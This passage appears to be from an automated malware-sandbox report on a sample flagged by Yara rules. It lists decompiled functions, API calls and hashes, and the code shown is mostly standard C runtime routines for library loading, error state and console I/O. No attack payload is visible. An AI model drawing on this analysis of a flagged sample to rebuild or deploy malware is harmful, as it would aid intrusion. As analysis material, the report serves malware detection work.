                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 321ce769e20ef609b5a88819d1b3fb84aacb39e9b4efd1d9210f5460c0bed61d
                                                  • Instruction ID: 0d3bf0a55512691f655575ad01bc9975a0493e168b3b8ba3aaf1ac224e894ea4
                                                  • Opcode Fuzzy Hash: 321ce769e20ef609b5a88819d1b3fb84aacb39e9b4efd1d9210f5460c0bed61d
                                                  • Instruction Fuzzy Hash: 70B1357190028E9FDB25CF9ACA817BEBFB5FF45360F2441A9F6489B241D2349D42C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B10649, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f2b4ffe87d98428a0b6e9e2e3d4f7bcd7205434dada3fc9d47559bb86e6e08d8
                                                  • Instruction ID: e84608b7d8a9d18b4fa631054f80d4af7abba39a1a358db786f247209db2935c
                                                  • Opcode Fuzzy Hash: f2b4ffe87d98428a0b6e9e2e3d4f7bcd7205434dada3fc9d47559bb86e6e08d8
                                                  • Instruction Fuzzy Hash: 0A412831A101046BDB217AF8CC86BFE3AE4EF55370F544295F518D62D1DAF49DC18BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0E2C3, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e62c31024ab95bbf6dec53800847912944b3d843130900ef92a637541dbbbc5
                                                  • Instruction ID: e60e9d97c20b2ea79dc71155ae725a472cfdf17bd0db23433c78c9e85203aadd
                                                  • Opcode Fuzzy Hash: 0e62c31024ab95bbf6dec53800847912944b3d843130900ef92a637541dbbbc5
                                                  • Instruction Fuzzy Hash: D641E7B1A00208BFD7259E78C845BAEBFE8EB49710F104AAEF165DB3C1D671E9408790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFC5DC, Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 4562fb9152cb879671b22aba573d1a369d6e82d42e60f65bf1c7fa6f03928aa6
                                                  • Instruction ID: 1a28384d476708be8558e1a346e3a50e4ae861f45137c06e67fa209fc5f3d466
                                                  • Opcode Fuzzy Hash: 4562fb9152cb879671b22aba573d1a369d6e82d42e60f65bf1c7fa6f03928aa6
                                                  • Instruction Fuzzy Hash: 2201D63290861D76DA6127FA9F85D3B326AAFC57B43252614F715D31E1DF24CC124121
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF2400, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d7f33d474bad9e5476e4d801c78574c86f8afd19be0ee1012cf6d55000f9374
                                                  • Instruction ID: 7b779e83cd0d50540044a06fe0a7a897af1d0d8bf33b9c508e9871325bb4daef
                                                  • Opcode Fuzzy Hash: 4d7f33d474bad9e5476e4d801c78574c86f8afd19be0ee1012cf6d55000f9374
                                                  • Instruction Fuzzy Hash: D901F2B220921D7EFA212AB86CC0F77664CEB817B5B314335F731A21C0DFA48C004260
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF247F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a322ef4e0312289e3f82fc7730378f2029b70c1c9e41be201ddc98e9cdb72e7a
                                                  • Instruction ID: 936bf53f0e185e4e773515d25490c8c5926ed0e286179a48af5a6e7bd4a7b3df
                                                  • Opcode Fuzzy Hash: a322ef4e0312289e3f82fc7730378f2029b70c1c9e41be201ddc98e9cdb72e7a
                                                  • Instruction Fuzzy Hash: 9B0162B250961E7ABA2127F86CC4E77665CEB957753318325F721521D1DFA48C104264
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x9e6834ec
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                  0x00405756
                                                  0x0040575a
                                                  0x00405761
                                                  0x00405765
                                                  0x00405773
                                                  0x00405789
                                                  0x0040578d
                                                  0x004057b6
                                                  0x004057b8
                                                  0x004057bc
                                                  0x004057bf
                                                  0x004057bf
                                                  0x004057c5
                                                  0x004057c7
                                                  0x00000000
                                                  0x004057c8
                                                  0x0040578f
                                                  0x00405798
                                                  0x004057a7
                                                  0x0040579a
                                                  0x0040579d
                                                  0x004057a3
                                                  0x004057a3
                                                  0x004057ab
                                                  0x00000000
                                                  0x004057ad
                                                  0x004057b0
                                                  0x004057b2
                                                  0x00000000
                                                  0x004057b2
                                                  0x004057ab
                                                  0x00405767
                                                  0x0040576c
                                                  0x00000000

                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                  • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                  • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                  • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                  • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x9
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x9
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                  0x00404320
                                                  0x00404320
                                                  0x00404320
                                                  0x0040432a
                                                  0x0040432c
                                                  0x00404331
                                                  0x00404334
                                                  0x00404342
                                                  0x00404349
                                                  0x0040434e
                                                  0x00404351
                                                  0x00404354
                                                  0x00404366
                                                  0x0040436b
                                                  0x0040436d
                                                  0x00404378
                                                  0x0040437f
                                                  0x00404384
                                                  0x00404387
                                                  0x00404389
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040436f
                                                  0x0040436f
                                                  0x00000000
                                                  0x0040436f
                                                  0x00404356
                                                  0x00404356
                                                  0x00404357
                                                  0x00404357
                                                  0x0040435c
                                                  0x00404397
                                                  0x00404398
                                                  0x0040439e
                                                  0x004043a3
                                                  0x004043a6
                                                  0x004043a7
                                                  0x004043a8
                                                  0x004043af
                                                  0x004043b1
                                                  0x004043b3
                                                  0x004043b8
                                                  0x004043bb
                                                  0x004043c9
                                                  0x004043d5
                                                  0x004043d8
                                                  0x004043db
                                                  0x004043ed
                                                  0x004043f2
                                                  0x004043f4
                                                  0x004043ff
                                                  0x00404405
                                                  0x0040440d
                                                  0x0040440f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004043f6
                                                  0x004043f6
                                                  0x00000000
                                                  0x004043f6
                                                  0x004043dd
                                                  0x004043dd
                                                  0x004043de
                                                  0x004043de
                                                  0x00404411
                                                  0x00404412
                                                  0x00404412
                                                  0x004043bd
                                                  0x004043c3
                                                  0x004043c7
                                                  0x0040441a
                                                  0x0040441b
                                                  0x00404421
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004043c7
                                                  0x00404428
                                                  0x00404428
                                                  0x00404336
                                                  0x0040433c
                                                  0x00404340
                                                  0x0040438b
                                                  0x0040438c
                                                  0x00404396
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404340

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                  • _abort.LIBCMT ref: 0040439E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_abort
                                                  • String ID:
                                                  • API String ID: 88804580-0
                                                  • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                                                  • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                  • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                                                  • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B102AA, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00B102C4
                                                  • GetLastError.KERNEL32 ref: 00B102D0
                                                    • Part of subcall function 00B10379: CloseHandle.KERNEL32(FFFFFFFE,00B103C3,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000,00000000), ref: 00B10389
                                                  • ___initconout.LIBCMT ref: 00B102E0
                                                    • Part of subcall function 00B1033B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B1036A,00B07EED,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000), ref: 00B1034E
                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00B102F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: f72df9fce16527bf523ead18512c16834974a5c737a48b6c13ac2daff2d284d0
                                                  • Instruction ID: c066a37f156aef2edd0ca28217165c1b3dd90e842034002412ef5c7d0dab47bb
                                                  • Opcode Fuzzy Hash: f72df9fce16527bf523ead18512c16834974a5c737a48b6c13ac2daff2d284d0
                                                  • Instruction Fuzzy Hash: E3F05E36101104ABCB222B96EC08D867FB6EFCD7507614855F699C3130CF7198E09B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B078F9, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadConsoleW.KERNEL32(?,?,?,00000000), ref: 00B07913
                                                  • GetLastError.KERNEL32 ref: 00B0791F
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B0792F
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • ReadConsoleW.KERNEL32(?,?,?,00000000), ref: 00B07943
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleRead$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 1921647122-0
                                                  • Opcode ID: ea4b04902a998651114e3f31058d8dcfdbc50c219d3d997ec29615825e774489
                                                  • Instruction ID: 343807a787a4c209d2dfb1d7443361571770c86b5cfe7076256dab0f52797106
                                                  • Opcode Fuzzy Hash: ea4b04902a998651114e3f31058d8dcfdbc50c219d3d997ec29615825e774489
                                                  • Instruction Fuzzy Hash: 82F08236140104BBCB222F96DC05D46BFF7EFC83207264459F54993170DF31E8619B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B079E3, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadConsoleInputA.KERNEL32(?,?,?), ref: 00B079FB
                                                  • GetLastError.KERNEL32 ref: 00B07A07
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07A17
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • ReadConsoleInputA.KERNEL32(?,?,?), ref: 00B07A2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 838051604-0
                                                  • Opcode ID: bae087c77f5f63c5ed4478965d096d05baef344bde32c33c0823c5e1524f05c9
                                                  • Instruction ID: 3a58c0c689105e8232f83965fdb455ef856c14b42160460de87c757a56c8dfde
                                                  • Opcode Fuzzy Hash: bae087c77f5f63c5ed4478965d096d05baef344bde32c33c0823c5e1524f05c9
                                                  • Instruction Fuzzy Hash: 1EF01236540504ABCB222F95DC08C8ABFE7FF8D3513254459F69983570DF31E8559B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B07AD6, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekConsoleInputA.KERNEL32(?,?,?), ref: 00B07AEE
                                                  • GetLastError.KERNEL32 ref: 00B07AFA
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07B0A
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • PeekConsoleInputA.KERNEL32(?,?,?), ref: 00B07B1D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleInputPeek$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 1545762386-0
                                                  • Opcode ID: f5390ad21ac87d804f305866e53d3b2e943e38f71eec7640ba994b8b2df9b023
                                                  • Instruction ID: 3d958068cb4f1221f463e0aa0cb763e752902b987ccea687713ef7e97b9ffd9e
                                                  • Opcode Fuzzy Hash: f5390ad21ac87d804f305866e53d3b2e943e38f71eec7640ba994b8b2df9b023
                                                  • Instruction Fuzzy Hash: 13F03736540644BBCB222F95DC08C46BFF7EF8D3613154499F65983530DF31E8A69B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B07A38, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadConsoleInputW.KERNEL32(?,?,?), ref: 00B07A50
                                                  • GetLastError.KERNEL32 ref: 00B07A5C
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07A6C
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • ReadConsoleInputW.KERNEL32(?,?,?), ref: 00B07A7F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 838051604-0
                                                  • Opcode ID: 028e2355fe44a659333fb691004a14469242b435a0a32736aa1b6d9b540976a6
                                                  • Instruction ID: 7a3ace634866e5d6056b7d8c96523ce448513c773125affcca05529191c05e46
                                                  • Opcode Fuzzy Hash: 028e2355fe44a659333fb691004a14469242b435a0a32736aa1b6d9b540976a6
                                                  • Instruction Fuzzy Hash: 48F01C3A540508ABCB222FD5DC08C8ABFE7EF8D3613254895F59A83530DF32E8659B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B10390, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,D77501FB,?,00000000,00000000,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000), ref: 00B103A7
                                                  • GetLastError.KERNEL32(?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000,00000000,?,00AFA119,?), ref: 00B103B3
                                                    • Part of subcall function 00B10379: CloseHandle.KERNEL32(FFFFFFFE,00B103C3,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000,00000000), ref: 00B10389
                                                  • ___initconout.LIBCMT ref: 00B103C3
                                                    • Part of subcall function 00B1033B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B1036A,00B07EED,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000), ref: 00B1034E
                                                  • WriteConsoleW.KERNEL32(00000000,D77501FB,?,00000000,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000), ref: 00B103D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 96d2e48f2094a011b22b0720eb94e75113a2d1fd85e5bf27b18cffe94879ffe5
                                                  • Instruction ID: fad63db66724fb1f9e3c5dfabb85a807a9da423f704075b738546d9c192458c3
                                                  • Opcode Fuzzy Hash: 96d2e48f2094a011b22b0720eb94e75113a2d1fd85e5bf27b18cffe94879ffe5
                                                  • Instruction Fuzzy Hash: 0DF01C36001118FBCF222F92EC09DDA7F66EF4D7A0F458150FA2896130CB7289A09B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0799A, Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00B079AC
                                                  • GetLastError.KERNEL32 ref: 00B079B8
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B079C8
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00B079D5
                                                  Memory Dump Source
